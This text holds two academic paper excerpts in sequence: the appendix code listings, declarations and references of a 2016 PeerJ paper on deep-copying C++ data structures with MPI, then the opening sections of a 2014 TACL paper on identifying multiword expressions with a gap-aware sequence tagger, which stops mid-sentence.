http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 49 // Ensure Scene can't be used incorrectly 50 Scene(const Scene &old) = delete; // Remove CopyConstructor 51 inline Scene& operator=(const Scene &old) = delete; // Remove CopyAssignment 52 53 // Move Constructor 54 Scene(Scene &&old) : mesh(std::move(old.mesh)), 55 materials (std::move(old.materials)), 56 camera(old.camera),rootNode(old.rootNode){ 57 old.mesh.clear(); 58 old.materials.clear(); 59 old.rootNode = nullptr; 60 } 61 62 // Move Assignment Operator 63 inline Scene& operator=(Scene &&old) { 64 mesh = std::move(old.mesh); 65 materials = std::move(old.materials); 66 rootNode = old.rootNode; 67 camera = old.camera; 68 old.mesh.clear(); 69 old.materials.clear(); 70 old.rootNode = nullptr; 71 return *this; 72 } 73 74 ∼Scene() { 75 MEL::MemDestruct(rootNode); 76 } 77 78 // Implementation of Ray-Scene intersection omitted for this example 79 bool intersect(const Ray &ray, Intersection &isect) const; 80 81 template<typename MSG> 82 inline void DeepCopy(MSG &msg) { 83 msg & mesh & materials; 84 msg.packPtr(rootNode); 85 } 86 }; Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 46/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Hand coded non-buffered Bcast of scene object Listing 24 Hand coded non-buffered Bcast of ray tracing scene object. 1 inline void MPI_NonBufferedBcast_Scene(Scene *&scene, const int root, const MPI_Comm comm) { 2 int rank; 3 MPI_Comm_rank(comm, &rank); 4 5 // Receiving nodes allocate space for scene 6 if (rank != root) { 7 MPI_Alloc_mem(sizeof(Scene), MPI_INFO_NULL, &scene); 8 new (scene) Scene(); 9 } 10 11 // Bcast the camera struct 12 MPI_Bcast(&(scene->camera), sizeof(Camera), MPI_CHAR, root, comm); 13 14 // Bcast the vector sizes 15 int sizes[2]; 16 if (rank == root) { 17 sizes[0] = (int) scene->mesh.size(); 18 sizes[1] = (int) scene->materials.size(); 19 } 20 MPI_Bcast(sizes, 2, MPI_INT, root, comm); 21 22 // ′Allocate′ space for vectors 23 if (rank != root) { 24 scene->mesh.resize(sizes[0]); 25 scene->materials.resize(sizes[1]); 26 } 27 28 // Bcast the vectors 29 MPI_Bcast(&(scene->mesh[0]), sizeof(Triangle) * sizes[0], MPI_CHAR, root, comm); 30 MPI_Bcast(&(scene->materials[0]), sizeof(Material) * sizes[1], MPI_CHAR, root, comm); 31 32 // Receiving nodes allocate space for rootNode 33 if (rank != root) { 34 MPI_Alloc_mem(sizeof(TreeNode), MPI_INFO_NULL, &(scene->rootNode)); Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 47/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 35 new (scene->rootNode) TreeNode(); 36 } 37 38 // While the stack is not empty there is work to be done 39 std::stack<TreeNode*> treeStack; 40 treeStack.push(scene->rootNode); 41 while (!treeStack.empty()) { 42 // Get the current node to traverse 43 TreeNode *currentNode = treeStack.top(); 44 treeStack.pop(); 45 46 // Bcast the current node's values 47 MPI_Bcast((currentNode), sizeof(TreeNode), MPI_CHAR, root, comm); 48 49 // Do we need to send/receive children? 50 bool hasChildren = (currentNode->leftChild != nullptr); 51 52 if (hasChildren) { 53 // Allocate space for child nodes on receiving process 54 if (rank != root) { 55 MPI_Alloc_mem(sizeof(TreeNode), MPI_INFO_NULL, &(currentNode->leftChild)); 56 MPI_Alloc_mem(sizeof(TreeNode), MPI_INFO_NULL, &(currentNode->rightChild)); 57 new (currentNode->leftChild) TreeNode(); 58 new (currentNode->rightChild) TreeNode(); 59 } 60 61 // Push children onto the stack so they get processed 62 treeStack.push(currentNode->leftChild); 63 treeStack.push(currentNode->rightChild); 64 } 65 } 66 } Hand coded buffered Bcast of scene object Listing 25 Hand coded buffered Bcast of ray tracing scene object. 1 inline void MPI_BufferedBcast_Scene(Scene *&scene, const int root, const MPI_Comm comm) { 2 int rank; Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 48/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 3 MPI_Comm_rank(comm, &rank); 4 5 // Receiving nodes allocate space for scene 6 if (rank != root) { 7 MPI_Alloc_mem(sizeof(Scene), MPI_INFO_NULL, &scene); 8 new (scene) Scene(); 9 } 10 11 // Calculate the byte size of the tree on root process 12 int packed_size = 0; 13 if (rank == root) { 14 packed_size += sizeof(Camera); 15 packed_size += sizeof(int) + ((int) scene->mesh.size() * sizeof(Triangle)); 16 packed_size += sizeof(int) + ((int) scene->materials.size() * sizeof(Material)); 17 18 // While the stack is not empty there is work to be done 19 std::stack<TreeNode*> treeStack; 20 treeStack.push(scene->rootNode); 21 while (!treeStack.empty()) { 22 // Get the current node to traverse 23 TreeNode *currentNode = treeStack.top(); 24 treeStack.pop(); 25 26 packed_size += sizeof(TreeNode); 27 28 // Do we need to send children? 29 bool hasChildren = (currentNode->leftChild != nullptr); 30 31 if (hasChildren) { 32 // Push children onto the stack so they get processed 33 treeStack.push(currentNode->leftChild); 34 treeStack.push(currentNode->rightChild); 35 } 36 } 37 } 38 39 // Share the buffer size to all processes 40 MPI_Bcast(&packed_size, 1, MPI_INT, root, comm); 41 42 // Allocate the buffer 43 int position = 0; Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 49/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 44 char *buffer; 45 MPI_Alloc_mem(packed_size, MPI_INFO_NULL, &(buffer)); 46 47 // If root then we pack the structure into the buffer 48 if (rank == root) { 49 // Pack the camera struct 50 MPI_Pack(&(scene->camera), sizeof(Camera), MPI_CHAR, buffer, packed_size, &position, comm); 51 52 int mesh_size = scene->mesh.size(), 53 materials_size = scene->materials.size(); 54 55 // Pack the mesh vector 56 MPI_Pack(&(mesh_size), 1, MPI_INT, buffer, packed_size, &position, comm); 57 MPI_Pack(&(scene->mesh[0]), mesh_size * sizeof(Triangle), 58 MPI_CHAR, buffer, packed_size, &position, comm); 59 60 // Pack the materials vector 61 MPI_Pack(&(materials_size), 1, MPI_INT, buffer, packed_size, &position, comm); 62 MPI_Pack(&(scene->materials[0]), materials_size * sizeof(Material), 63 MPI_CHAR, buffer, packed_size, &position, comm); 64 65 // While the stack is not empty there is work to be done 66 std::stack<TreeNode*> treeStack; 67 treeStack.push(scene->rootNode); 68 while (!treeStack.empty()) { 69 // Get the current node to traverse 70 TreeNode *currentNode = treeStack.top(); 71 treeStack.pop(); 72 73 // Pack the current node 74 MPI_Pack(currentNode, sizeof(TreeNode), 75 MPI_CHAR,buffer,packed_size,&position,comm); 76 77 // Do we need to send children? 78 bool hasChildren = (currentNode->leftChild != nullptr); 79 80 if (hasChildren) { 81 // Push children onto the stack so they get processed 82 treeStack.push(currentNode->leftChild); Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 50/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 83 treeStack.push(currentNode->rightChild); 84 } 85 } 86 87 // Send the buffer 88 MPI_Bcast(buffer, packed_size, MPI_CHAR, root, comm); 89 } 90 91 // If not root then we unpack the structure from the buffer 92 else { 93 // Receive the packed buffer 94 MPI_Bcast(buffer, packed_size, MPI_CHAR, root, comm); 95 96 MPI_Alloc_mem(sizeof(TreeNode), MPI_INFO_NULL, &(scene->rootNode)); 97 new (scene->rootNode) TreeNode(); 98 99 // Unpack the camera struct 100 int mesh_size, materials_size; 101 MPI_Unpack(buffer, packed_size, &position, &(scene->camera), 102 sizeof(Camera), MPI_CHAR, comm); 103 104 // Unpack mesh vector 105 MPI_Unpack(buffer, packed_size, &position, &(mesh_size), 1, MPI_INT, comm); 106 scene->mesh.resize(mesh_size); 107 MPI_Unpack(buffer, packed_size, &position, &(scene->mesh [0]), 108 mesh_size * sizeof(Triangle), MPI_CHAR, comm); 109 110 // Unpack materials vector 111 MPI_Unpack(buffer, packed_size, &position, &(materials_size), 1, MPI_INT, comm); 112 scene->materials.resize(materials_size); 113 MPI_Unpack(buffer, packed_size, &position, &(scene->materials[0]), 114 materials_size*sizeof(Material),MPI_CHAR,comm); 115 116 // While the stack is not empty there is work to be done 117 std::stack<TreeNode*> treeStack; 118 treeStack.push(scene->rootNode); 119 while (!treeStack.empty()) { Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 51/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 120 // Get the current node to traverse 121 TreeNode *currentNode = treeStack.top(); 122 treeStack.pop(); 123 124 // Unpack the current node 125 MPI_Unpack(buffer, packed_size, &position, currentNode, 126 sizeof(TreeNode), MPI_CHAR, comm); 127 128 // Do we need to receive children? 129 bool hasChildren = (currentNode->leftChild != nullptr); 130 131 if (hasChildren) { 132 // Allocate space for child nodes on receiving process 133 MPI_Alloc_mem(sizeof(TreeNode), MPI_INFO_NULL, &(currentNode->leftChild)); 134 MPI_Alloc_mem(sizeof(TreeNode), MPI_INFO_NULL, &(currentNode->rightChild)); 135 new (currentNode->leftChild) TreeNode(); 136 new (currentNode->rightChild) TreeNode(); 137 138 // Push children onto the stack so they get processed 139 treeStack.push(currentNode->leftChild); 140 treeStack.push(currentNode->rightChild); 141 } 142 } 143 } 144 145 // Clean up 146 MPI_Free_mem(buffer); 147 } Experiment 2: communicating generic directed graph structures Listing 26 Functions for constructing directed graphs in different shapes. 1 //------------------------------------------------------------// 2 // Example Usage: // 3 // mpirun -n [num of procs] ./GraphCycles [graph nodes: 0 <= n] [graph type: 0 <= t <= 3] // 4 // mpirun -n 8 ./GraphCycles 11 0 // 5 //------------------------------------------------------------// 6 int main(int argc, char *argv[]) { 7 MEL::Init(argc, argv); Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 52/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 8 9 MEL::Comm comm = MEL::Comm::WORLD; 10 const int rank = MEL::CommRank(comm), 11 size = MEL::CommSize(comm); 12 13 if (argc != 3) { 14 if (rank == 0) 15 std::cout << "Wrong number of parameters..." << std::endl; 16 MEL::Exit(-1); 17 } 18 19 const int numNodes = 1 << std::stoi(argv[1]), // 2^n nodes 20 graphType = std::stoi(argv[2]); 21 22 DiGraphNode<int> *graph = nullptr; 23 if (rank == 0) { 24 switch (graphType) { 25 case 0: 26 graph = MakeBTreeGraph(numNodes); 27 break; 28 case 1: 29 graph = MakeRingGraph(numNodes); 30 break; 31 case 2: 32 graph = MakeRandomGraph(numNodes); 33 break; 34 case 3: 35 graph = MakeFullyConnectedGraph(numNodes); 36 break; 37 } 38 } 39 40 MEL::Barrier(comm); 41 auto startTime = MEL::Wtime(); // Start the clock! 42 43 // Deep copy the graph to all nodes 44 MEL::Deep::Bcast(graph, 0, comm); 45 46 MEL::Barrier(comm); 47 auto endTime = MEL::Wtime(); // Stop the clock! 48 49 if (rank == 0) { 50 std::cout << "Broadcast Graph in " << (endTime - startTime) Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 53/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 51 << " seconds..." << std::endl; 52 } 53 54 // File name for output 55 std::stringstream sstr; 56 sstr << "rank=" << rank << " type=" << graphType << " nodes=" << numNodes << ".graph"; 57 58 // Save the output to disk from each node 59 std::ofstream graphFile(sstr.str(), std::ios::out | std::ios::binary); 60 if (graphFile.is_open()) { 61 MEL::Deep::FileWrite(graph, graphFile); 62 graphFile.close(); 63 } 64 65 DestructGraph(graph); 66 67 MEL::Finalize(); 68 return 0; 69 } Factory functions for building directed graphs in different shaped structures Listing 27 Functions for constructing directed graphs in different shapes. 1 inline DiGraphNode<int>* MakeBTreeGraph(const int numNodes) { 2 /// BTree Graph 3 std::vector<DiGraphNode<int>*> nodes(numNodes); 4 for (int i = 0; i < numNodes; ++i) { 5 nodes[i] = MEL::MemConstruct<DiGraphNode<int>>(i); 6 } 7 8 if (numNodes > 1) nodes[0]->edges.push_back(nodes[1]); 9 10 for (int i = 1; i < numNodes; ++i) { 11 const int j = ((i - 1) * 2) + 2; 12 nodes[i]->edges.reserve(2); 13 if (j < numNodes) nodes[i]->edges.push_back(nodes[j]); 14 if ((j + 1) < numNodes) nodes[i]->edges.push_back(nodes [j + 1]); 15 } Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 54/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 16 return nodes[0]; 17 } 18 19 inline DiGraphNode<int>* MakeRingGraph(const int numNodes) { 20 /// Ring Graph 21 std::vector<DiGraphNode<int>*> nodes(numNodes); 22 for (int i = 0; i < numNodes; ++i) { 23 nodes[i] = MEL::MemConstruct<DiGraphNode<int>>(i); 24 } 25 26 for (int i = 0; i < numNodes; ++i) { 27 nodes[i]->edges.reserve(2); 28 nodes[i]->edges.push_back(nodes[(i + 1) % numNodes]); 29 nodes[i]->edges.push_back(nodes[(i == 0) ? (numNodes - 1) : (i - 1)]); 30 } 31 return nodes[0]; 32 } 33 34 inline DiGraphNode<int>* MakeRandomGraph(const int numNodes) { 35 srand(1234567); 36 37 /// Random Graph 38 std::vector<DiGraphNode<int>*> nodes(numNodes); 39 for (int i = 0; i < numNodes; ++i) { 40 nodes[i] = MEL::MemConstruct<DiGraphNode<int>>(i); 41 } 42 43 for (int i = 0; i < numNodes; ++i) { 44 const int numEdges = rand() % numNodes; 45 nodes[i]->edges.reserve(numEdges); 46 nodes[i]->edges.push_back(nodes[(i + 1) % numNodes]); 47 for (int j = 1; j < numEdges; ++j) { 48 nodes[i]->edges.push_back(nodes[rand() % numNodes]); 49 } 50 } 51 return nodes[0]; 52 } 53 54 inlineDiGraphNode<int>*MakeFullyConnectedGraph(constintnumNodes){ 55 /// Fully Connected Graph 56 std::vector<DiGraphNode<int>*> nodes(numNodes); 57 for (int i = 0; i < numNodes; ++i) { Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 55/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 58 nodes[i] = MEL::MemConstruct<DiGraphNode<int>>(i); 59 } 60 61 for (int i = 0; i < numNodes; ++i) { 62 nodes[i]->edges.reserve(numNodes); 63 for (int j = 0; j < numNodes; ++j) { 64 nodes[i]->edges.push_back(nodes[j]); 65 } 66 } 67 68 return nodes[0]; 69 } Generic implementation of directed graph container Listing 28 Generic implementation of directed graph container for deep copy. 1 template<typename T> 2 struct DiGraphNode { 3 T value; 4 std::vector<DiGraphNode<T>*> edges; 5 6 DiGraphNode() {}; 7 explicit DiGraphNode(const T &_value) : value(_value) {}; 8 9 template<typename MSG> 10 inline void DeepCopy(MSG &msg) { 11 msg & edges; 12 for (auto &e : edges) msg.packSharedPtr(e); 13 } 14 }; 15 16 inline void VisitGraph(DiGraphNode<int> *&root, 17 std::function<void(DiGraphNode<int> *&node)> func) { 18 19 std::unordered_set<DiGraphNode<int>*> pointerMap; 20 std::stack<DiGraphNode<int>*> stack; 21 22 stack.push(root); 23 while (!stack.empty()) { 24 DiGraphNode<int> *node = stack.top(); 25 stack.pop(); Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 56/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ 26 27 // If node has not been visited 28 if (pointerMap.find(node) == pointerMap.end()) { 29 pointerMap.insert(node); 30 for (auto e : node->edges) stack.push(e); 31 func(node); 32 } 33 } 34 } 35 36 inline void DestructGraph(DiGraphNode<int> *&root) { 37 VisitGraph(root, [](DiGraphNode<int> *&node) -> void { 38 MEL::MemDestruct(node); 39 }); 40 } ADDITIONAL INFORMATION AND DECLARATIONS Funding Joss Whittle is funded by an EPSRC PhD studentship. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: EPSRC PhD studentship. Competing Interests The authors declare that they have no competing interests. Author Contributions � Joss Whittle conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. � Rita Borgo conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. � Mark W. Jones conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. Data Deposition The following information was supplied regarding data availability: Source code available at: https://github.com/CS-Swansea/MEL. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 57/59 https://github.com/CS-Swansea/MEL http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ REFERENCES Beyer J, Oehmke D, Sandoval J. 2014. Transferring userdefined types in OpenACC. In: Proceedings Cray User Group (CUG’14). Lugano: Cray User Group. Boost-Community. 2015. Boost C++ libraries. Version 1.62. Available at http://boost.org (accessed 7 November 2016). Bouteiller A. 2015. Fault-tolerant MPI. In: Herault T, Robert Y, eds. Fault-Tolerance Techniques for High-Performance Computing, Chapter 3. Heidelberg, New York, Dordrecht, London: Springer Publishing Company, Incorporated, 145–228. Cogswell J. 2005. Adding an easy file save and file load mechanism to your C++ program. InformIT. Available at http://www.boost.org/doc/libs/release/libs/serialization/ (accessed 7 November 2016). Fagg GE, Bukovsky A, Dongarra JJ. 2001. Harness and fault tolerant MPI. Parallel Computing 27(11):1479–1495 DOI 10.1016/S0167-8191(01)00100-4. Fagg GE, Dongarra JJ. 2004. Building and using a fault-tolerant MPI implementation. International Journal of High Performance Computing Applications 18(3):353–361 DOI 10.1177/1094342004046052. Friedley A, Hoefler T, Bronevetsky G, Lumsdaine A. 2013. Ownership passing: efficient distributed memory programming on multi-core systems. In: Proceedings of the 18th ACM SIGPLAN Symposium on Principles and Practice of Parallel Programming, Shenzen, China. New York: ACM, 177–186. GNA. 2008. Autoserial library. Available at http://home.gna.org/autoserial/mpi.html. Goujon DS, Michel M, Peeters J, Devaney JE. 1998. Automap and autolink tools for communicating complex and dynamic data-structures using MPI. In: Panda DK, Stunkel CB, eds. Network-Based Parallel Computing Communication, Architecture, and Applications CANPC ’98. Berlin, Heidelberg: Springer, 98–109. Gropp W, Lusk E. 2004. Fault tolerance in message passing interface programs. International Journal of High Performance Computing Applications 18(3):363–372 DOI 10.1177/1094342004046045. Grundmann T, Ritt M, Rosenstiel W. 2000. TPO++: an object-oriented message-passing library in C++. In: Proceedings of the 2000 international conference on parallel processing. Piscataway: IEEE, 43–50. Herault T, Robert Y. 2015. Fault-Tolerance Techniques for High-Performance Computing. First edition. Switzerland: Springer International Publishing, 3–85. Hoefler T, Snir M. 2011. Writing parallel libraries with MPI–common practice. In: Proceedings of the 18th MPI Users’ Group Meeting. Vol. 6960. Berlin, Heidelberg: Springer, 345–355. Huang C, Zheng G, Kalé L, Kumar S. 2006. Performance evaluation of adaptive MPI. In: Proceedings of the Eleventh ACM SIGPLAN Symposium on Principles and Practice of Parallel Programming, PPoPP ’06. New York: ACM, 12–21. Kale LV, Krishnan S. 1993. CHARM++: a portable concurrent object oriented system based on C++. In: Proceedings of the Eighth Annual Conference on Object-oriented Programming Systems, Languages, and Applications, OOPSLA ’93. New York: ACM, 91–108. Laguna I, Richards DF, Gamblin T, Schulz M, de Supinski BR. 2014. Evaluating user-level fault tolerance for MPI applications. In: Proceedings of the 21st European MPI Users’ Group Meeting, EuroMPI/ASIA ’14. New York: ACM, 57–62. Lee EA. 2006. The problem with threads. Computer 39(5):33–42 DOI 10.1109/MC.2006.180. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 58/59 http://boost.org http://www.boost.org/doc/libs/release/libs/serialization/ http://dx.doi.org/10.1016/S0167-8191(01)00100-4 http://dx.doi.org/10.1177/1094342004046052 http://home.gna.org/autoserial/mpi.html http://dx.doi.org/10.1177/1094342004046045 http://dx.doi.org/10.1109/MC.2006.180 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Lee L-Q, Lumsdaine A. 2003. The generic message passing framework. In: Parallel and Distributed Processing Symposium, 2003. Proceedings. International. Piscataway: IEEE. McCandless BC, Squyres JM, Lumsdaine A. 1996. Object oriented MPI (OOMPI): a class library for the message passing interface. In: MPI Developer’s Conference, 1996. Piscataway: IEEE, 87–94. Message Passing Interface Forum. 2014. MPI: a message-passing interface standard version 3.1. Technical report. Stuttgart, DE: High Performance Computing Center Stuttgart (HLRS). Miller P. 2015. Productive parallel programming with CHARM++. In: Proceedings of the Symposium on High Performance Computing HPC ’15. San Diego: Society for Computer Simulation International, 241–242. Renault É. 2007. Extended MPICC to generate MPI derived datatypes from C datatypes automatically. In: Cappello F, Herault T, Dongarra J, eds. Recent Advances in Parallel Virtual Machine and Message Passing Interface: 14th European PVM/MPI User’s Group Meeting. Berlin, Heidelberg: Springer, 307–314. Tansey W, Tilevich E. 2008. Efficient automated marshaling of C++ data structures for MPI applications. In: IEEE International Symposium on Parallel and Distributed Processing, 2008. IPDPS 2008. Piscataway: IEEE, 1–12. Vishnu A, Dam HV, de Jong W, Balaji P, Song S. 2010. Fault-tolerant communication runtime support for data-centric programming models. In: 2010 International Conference on High Performance Computing, HiPC 2010, Dona Paula, Goa, India, December 19–22, 2010. Piscataway: IEEE, 1–9. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 59/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ Implementing generalized deep-copy in MPI Introduction Related Work When to Use Deep Copy MEL–The MPI Extension Library MEL Implementation Details Benchmarks Conclusions and Future Work Appendices References work_zwxfdtyt5jcbtelumlduow5tpu ---- Discriminative Lexical Semantic Segmentation with Gaps: Running the MWE Gamut Discriminative Lexical Semantic Segmentation with Gaps: Running the MWE Gamut Nathan Schneider Emily Danchik Chris Dyer Noah A. Smith School of Computer Science Carnegie Mellon University Pittsburgh, PA 15213, USA {nschneid,emilydan,cdyer,nasmith}@cs.cmu.edu Abstract We present a novel representation, evaluation measure, and supervised models for the task of identifying the multiword expressions (MWEs) in a sentence, resulting in a lexical seman- tic segmentation. Our approach generalizes a standard chunking representation to encode MWEs containing gaps, thereby enabling effi- cient sequence tagging algorithms for feature- rich discriminative models. Experiments on a new dataset of English web text offer the first linguistically-driven evaluation of MWE iden- tification with truly heterogeneous expression types. Our statistical sequence model greatly outperforms a lookup-based segmentation pro- cedure, achieving nearly 60% F1 for MWE identification. 1 Introduction Language has a knack for defying expectations when put under the microscope. For example, there is the notion—sometimes referred to as compositionality— that words will behave in predictable ways, with indi- vidual meanings that combine to form complex mean- ings according to general grammatical principles. Yet language is awash with examples to the contrary: in particular, idiomatic expressions such as awash with NP, have a knack for VP-ing, to the contrary, and defy expectations. Thanks to processes like metaphor and grammaticalization, these are (to various degrees) semantically opaque, structurally fossilized, and/or statistically idiosyncratic. In other words, idiomatic expressions may be exceptional in form, function, or distribution. They are so diverse, so unruly, so 1. MW named entities: Prime Minister Tony Blair 2. MW compounds: hot air balloon, skinny dip 3. conventionally SW compounds: somewhere 4. verb-particle: pick up, dry out, take over, cut short 5. verb-preposition: refer to, depend on, look for 6. verb-noun(-preposition): pay attention (to) 7. support verb: make decisions, take pictures 8. other phrasal verb: put up with, get rid of 9. PP modifier: above board, at all, from time to time 10. coordinated phrase: cut and dry, more or less 11. connective: as well as, let alone, in spite of 12. semi-fixed VP: pick up where <one> left off 13. fixed phrase: scared to death, leave of absence 14. phatic: You’re welcome. Me neither! 15. proverb: Beggars can’t be choosers. Figure 1: Some of the classes of idioms in English. The examples included here contain multiple lexicalized words—with the exception of those in (3), if the conven- tional single-word (SW) spelling is used. difficult to circumscribe, that entire theories of syn- tax are predicated on the notion that constructions with idiosyncratic form-meaning mappings (Fillmore et al., 1988; Goldberg, 1995) or statistical properties (Goldberg, 2006) offer crucial evidence about the grammatical organization of language. Here we focus on multiword expressions (MWEs): lexicalized combinations of two or more words that are exceptional enough to be considered as single units in the lexicon. As figure 1 illus- trates, MWEs occupy diverse syntactic and semantic functions. Within MWEs, we distinguish (a) proper names and (b) lexical idioms. The latter have proved themselves a “pain in the neck for NLP” (Sag et al., 2002). Automatic and efficient detection of MWEs, though far from solved, would have diverse appli- 193 Transactions of the Association for Computational Linguistics, 2 (2014) 193–206. Action Editor: Joakim Nivre. Submitted 12/2013; Revised 1/2014; Published 4/2014. c©2014 Association for Computational Linguistics. cations including machine translation (Carpuat and Diab, 2010), information retrieval (Newman et al., 2012), opinion mining (Berend, 2011), and second language learning (Ellis et al., 2008). It is difficult to establish any comprehensive tax- onomy of multiword idioms, let alone develop lin- guistic criteria and corpus resources that cut across these types. Consequently, the voluminous litera- ture on MWEs in computational linguistics—see §7, Baldwin and Kim (2010), and Ramisch (2012) for surveys—has been fragmented, looking (for exam- ple) at subclasses of phrasal verbs or nominal com- pounds in isolation. To the extent that MWEs have been annotated in existing corpora, it has usually been as a secondary aspect of some other scheme. Traditionally, such resources have prioritized certain kinds of MWEs to the exclusion of others, so they are not appropriate for evaluating general-purpose identification systems. In this article, we briefly review a shallow form of analysis for MWEs that is neutral to expression type, and that facilitates free text annotation with- out requiring a prespecified MWE lexicon (§2). The scheme applies to gappy (discontinuous) as well as contiguous expressions, and allows for a qualitative distinction of association strengths. In Schneider et al. (2014) we have applied this scheme to fully an- notate a 55,000-word corpus of English web reviews (Bies et al., 2012a), a conversational genre in which colloquial idioms are highly salient. This article’s main contribution is to show that the representation— constrained according to linguistically motivated as- sumptions (§3)—can be transformed into a sequence tagging scheme that resembles standard approaches in named entity recognition and other text chunking tasks (§4). Along these lines, we develop a discrim- inative, structured model of MWEs in context (§5) and train, evaluate, and examine it on the annotated corpus (§6). Finally, in §7 and §8 we comment on related work and future directions. 2 Annotated Corpus To build and evaluate a multiword expression ana- lyzer, we use the MWE-annotated corpus of Schnei- der et al. (2014). It consists of informal English web text that has been specifically and completely anno- tated for MWEs, without reference to any particular lexicon. To the best of our knowledge, this corpus is the first to be freely annotated for many kinds of MWEs (without reference to a lexicon), and is also the first dataset of social media text with MWE an- notations beyond named entities. This section gives a synopsis of the annotation conventions used to de- velop that resource, as they are important to under- standing our models and evaluation. Rationale. The multiword expressions community has lacked a canonical corpus resource comparable to benchmark datasets used for problems such as NER and parsing. Consequently, the MWE litera- ture has been driven by lexicography: typically, the goal is to acquire an MWE lexicon with little or no supervision, or to apply such a lexicon to corpus data. Studies of MWEs in context have focused on various subclasses of constructions in isolation, ne- cessitating special-purpose datasets and evaluation schemes. By contrast, Schneider et al.’s (2014) cor- pus creates an opportunity to tackle general-purpose MWE identification, such as would be desirable for use by high-coverage downstream NLP systems. It is used to train and evaluate our models below. The cor- pus is publicly available as a benchmark for further research.1 Data. The documents in the corpus are online user reviews of restaurants, medical providers, retailers, automotive services, pet care services, etc. Marked by conversational and opinionated language, this genre is fertile ground for colloquial idioms (Nunberg et al., 1994; Moon, 1998). The 723 reviews (55,000 words, 3,800 sentences) in the English Web Tree- bank (WTB; Bies et al., 2012b) were collected by Google, tokenized, and annotated with phrase struc- ture trees in the style of the Penn Treebank (Marcus et al., 1993). MWE annotators used the sentence and word tokenizations supplied by the treebank.2 Annotation scheme. The annotation scheme itself was designed to be as simple as possible. It consists of grouping together the tokens in each sentence that belong to the same MWE instance. While annotation guidelines provide examples of MWE groupings in a wide range of constructions, the annotator is not 1http://www.ark.cs.cmu.edu/LexSem/ 2Because we use treebank data, syntactic parses are available to assist in post hoc analysis. Syntactic information was not shown to annotators. 194 # of constituent tokens 2 3 ≥4 total strong 2257 595 172 3024 weak 269 121 69 459 2526 716 241 3483 # of gaps 0 1 2 2626 394 4 322 135 2 2948 529 6 Table 1: Counts in the MWE corpus. tied to any particular taxonomy or syntactic structure. This simplifies the number of decisions that have to be made for each sentence, even if some are difficult. Further instructions to annotators included: • Groups should include only the lexically fixed parts of an expression (modulo inflectional morphology); this generally excludes determiners and pronouns: made the mistake, pride themselves on. • Multiword proper names count as MWEs. • Misspelled or unconventionally spelled tokens are interpreted according to the intended word if clear. • Overtokenized words (spelled as two tokens, but conventionally one word) are joined as multiwords. Clitics separated by the tokenization in the corpus— negative n’t, possessive ’s, etc.—are joined if func- tioning as a fixed part of a multiword (e.g., T ’s Cafe), but not if used productively. Gaps. There are, broadly speaking, three reasons to group together tokens that are not fully contigu- ous. Most commonly, gaps contain internal modifiers, such as good in make good decisions. Syntactic con- structions such as the passive can result in gaps that might not otherwise be present: in good decisions were made, there is instead a gap filled by the pas- sive auxiliary. Finally, some MWEs may take internal arguments: they gave me a break. Figure 1 has addi- tional examples. Multiple gaps can occur even within the same expression, though it is rare: they agreed to give Bob a well-deserved break. Strength. The annotation scheme has two “strength” levels for MWEs. Clearly idiomatic ex- pressions are marked as strong MWEs, while mostly compositional but especially frequent collocations/ phrases (e.g., abundantly clear and patently obvious) are marked as weak MWEs. Weak multiword groups are allowed to include strong MWEs as constituents (but not vice versa). Strong groups are required to cohere when used inside weak groups: that is, a weak group cannot include only part of a strong group. For purposes of annotation, there were no constraints hinging on the ordering of tokens in the sentence. Process. MWE annotation proceeded one sentence at a time. The 6 annotators referred to and improved the guidelines document on an ongoing basis. Every sentence was seen independently by at least 2 an- notators, and differences of opinion were discussed and resolved (often by marking a weak MWE as a compromise). See Schneider et al. (2014) for details. Statistics. The annotated corpus consists of 723 documents (3,812 sentences). MWEs are frequent in this domain: 57% of sentences (72% of sentences over 10 words long) and 88% of documents contain at least one MWE. 8,060/55,579=15% of tokens belong to an MWE; in total, there are 3,483 MWE instances. 544 (16%) are strong MWEs containing a gold-tagged proper noun—most are proper names. A breakdown appears in table 1. 3 Representation and Task Definition We define a lexical segmentation of a sentence as a 